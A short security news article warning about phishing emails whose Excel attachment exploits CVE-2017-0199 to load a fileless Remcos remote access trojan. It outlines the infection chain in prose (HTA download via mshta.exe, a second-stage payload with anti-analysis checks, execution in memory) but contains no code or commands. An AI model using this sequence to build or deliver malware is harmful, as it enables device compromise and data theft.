Beware, that Excel document could be infected with dangerous malware.
An Excel file containing fileless malware is circulating widely.
Recently, a new phishing campaign has been identified that involves the distribution of an Excel file. This file is designed to install a fileless version of the Remcos remote access trojan on the victims' devices. Remcos is capable of stealing sensitive information, logging keystrokes, and more.
Researchers have detected that cybercriminals are sending phishing emails with the usual subject line related to purchase orders. These emails include a Microsoft Excel file that exploits a remote code execution vulnerability in Office (CVE-2017-0199). When the file is opened, it downloads an HTML Application (HTA) file from a remote server, which is executed using mshta.exe. This file then downloads a second payload from the same server, which carries out certain anti-analysis and anti-debugging checks before proceeding to download and execute the Remcos trojan.
Historically, Remcos has not always been classified as malware; it was originally developed as legitimate commercial software for remote administration tasks. However, like other programs such as Cobalt Strike, it has been co-opted by cybercriminals and is primarily used for unauthorized access, data theft, and espionage. Remcos has the ability to log keystrokes, capture screenshots, and execute commands on infected systems.
What sets this version of Remcos apart is that it is deployed directly in the device's memory: "Instead of saving the Remcos file in a local location and executing it, it is deployed directly in the memory of the current process," experts explained. "In other words, it is a fileless variant of Remcos."
Phishing through emails remains one of the most common methods that cybercriminals use to infect devices with malware and steal sensitive information. This approach is cost-effective and efficient, making it a highly effective attack vector. To defend against phishing, it is recommended to apply common sense when reading emails and to be particularly cautious when downloading and executing any attachments.
